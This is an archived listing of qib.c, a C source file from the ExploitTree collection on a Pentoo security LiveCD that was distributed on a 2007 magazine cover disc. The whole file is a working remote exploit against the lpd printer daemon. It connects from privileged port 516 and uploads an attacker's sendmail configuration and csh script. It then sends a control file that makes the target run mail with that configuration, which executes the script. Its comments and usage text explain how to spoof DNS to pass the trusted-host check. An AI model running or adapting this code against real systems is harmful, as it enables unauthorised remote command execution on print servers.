Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / lpd / qib.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 5KB | 208 lines

/* qib.c - remote lpd exploit requires that the attacking host has remote LPD access, or even better, that you are controlling your own DNS. If you are, then just claim that your host name resolves to the host name that "gethostname()" would return on the lpd machine. The local 'lpd' machine is always considered trusted to print */ #include<sys/types.h> #include<sys/socket.h> #include<sys/stat.h> #include<unistd.h> #include<string.h> #include<fcntl.h> #include<netinet/in.h> #include<arpa/inet.h> #include<netdb.h> int main(int argc, char **argv) { char sendbuf[16384]; char recvbuf[16384]; char cffilestr[]="Heat.my.shorts.com\nProot\nJaint.got.no.job\nCaint.got.no.class\nLwho.am.i\ndfunclefscker\nUdfunclefscker\nM-C/var/spool/lpd/%s/dfunclefscker\nN\n"; char cffile[2048]; char *dffile; int df,i,dfpos; char *dffile2; int dfpos2; int s; unsigned long addr,locaddr; struct sockaddr_in saddr, slocaddr; char *localip,*targethost,*printer,*sendmailcfg,*cshscript; struct stat stats; char zero[]=""; /* Give usage */ if(argc!=6) { printf("\nUsage: %s <local ip to use> <host to attack> <printer name> <sendmail cfgfile> <csh script to run>\n\n The local address you choose must reverse-resolve,\n and it must be on an interface on your local machine.\n Oh, and you have to be root to do this.\n\n",argv[0]); return 0; } /* Give readable names to arguments */ localip=argv[1]; targethost=argv[2]; printer=argv[3]; sendmailcfg=argv[4]; cshscript=argv[5]; /* Get the local machine name */ if((locaddr=inet_addr(localip))==INADDR_NONE) { struct hostent *he; he=gethostbyname(argv[1]); if(he==NULL) { printf("couldn't resolve local hostname.\n"); return 0; } locaddr=*(unsigned long *)(he->h_addr_list[0]); } /* Get the target machine address */ if((addr=inet_addr(targethost))==INADDR_NONE) { struct hostent *he; he=gethostbyname(targethost); if(he==NULL) { printf("couldn't resolve hostname.\n"); return 0; } addr=*(unsigned long *)(he->h_addr_list[0]); } /* Put the printer name in the cf file string */ snprintf(cffile,2048,cffilestr,printer); /* Get the size of the sendmail config file to send over */ if(stat(sendmailcfg,&stats)==-1) { printf("Couldn't stat %s\n",sendmailcfg); return 0; } /* Allocate memory for the cfg file */ dffile=(char *)malloc(stats.st_size+256); if(dffile==NULL) { printf("Couldn't allocate memory.\n"); return 0; } /* Load the config file, replacing %s with printer name */ dfpos=0; df=open(sendmailcfg,O_RDONLY); if(df==-1) return 0; for(i=0;i<stats.st_size;i++) { char c; read(df,&c,1); if(c=='%') { read(df,&c,1); i++; if(c=='s') { memcpy(dffile+dfpos,printer,strlen(printer)); dfpos+=strlen(printer); } else { dffile[dfpos]='%'; dfpos++; dffile[dfpos]=c; dfpos++; } } else { dffile[dfpos]=c; dfpos++; } } close(df); /* Get the size of the script file to send over */ if(stat(cshscript,&stats)==-1) { printf("Couldn't stat %s\n",cshscript); return 0; } /* Allocate memory for the csh script file */ dffile2=(char *)malloc(stats.st_size+256); if(dffile2==NULL) { printf("Couldn't allocate memory.\n"); return 0; } /* Load the config file */ dfpos2=0; df=open(cshscript,O_RDONLY); if(df==-1) return 0; for(i=0;i<stats.st_size;i++) { char c; read(df,&c,1); dffile2[dfpos2]=c; dfpos2++; } close(df); /* Create a TCP socket */ s=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); /* Aim it at the target machine, coming from our local address, port 516 */ memset(&slocaddr,0,sizeof(struct sockaddr_in)); slocaddr.sin_addr.s_addr=locaddr; slocaddr.sin_port=htons(516); slocaddr.sin_family=AF_INET; if(bind(s,(struct sockaddr *) &slocaddr,sizeof(struct sockaddr_in))==-1) { printf("couldn't bind local socket.\n"); close(s); return 0; } memset(&saddr,0,sizeof(struct sockaddr_in)); saddr.sin_addr.s_addr=addr; saddr.sin_port=htons(515); saddr.sin_family=AF_INET; /* Connect to the remote LPD daemon */ if(connect(s,(struct sockaddr *) &saddr,sizeof(struct sockaddr_in))==-1) { printf("couldn't connect to remote machine.\n"); close(s); return 0; } /* Send print request */ sprintf(sendbuf,"%c%s\n",2,printer); send(s,sendbuf,strlen(sendbuf),0); recv(s,recvbuf,1,0); /* Send DF file (sendmail config file) */ sprintf(sendbuf,"%c%d dfunclefscker@eat.my.shorts.com\n",3,dfpos); send(s,sendbuf,strlen(sendbuf),0); recv(s,recvbuf,1,0); send(s,dffile,dfpos,0); send(s,zero,1,0); recv(s,recvbuf,1,0); /* Send DF file (script to execute) */ sprintf(sendbuf,"%c%d dffunkyscript\n",3,dfpos2); send(s,sendbuf,strlen(sendbuf),0); recv(s,recvbuf,1,0); send(s,dffile2,dfpos2,0); send(s,zero,1,0); recv(s,recvbuf,1,0); /* Send CF file */ sprintf(sendbuf,"%c%d cfunclefscker\n",2,strlen(cffile)); send(s,sendbuf,strlen(sendbuf),0); recv(s,recvbuf,1,0); send(s,cffile,strlen(cffile)+1,0); recv(s,recvbuf,1,0); close(s); return 0; }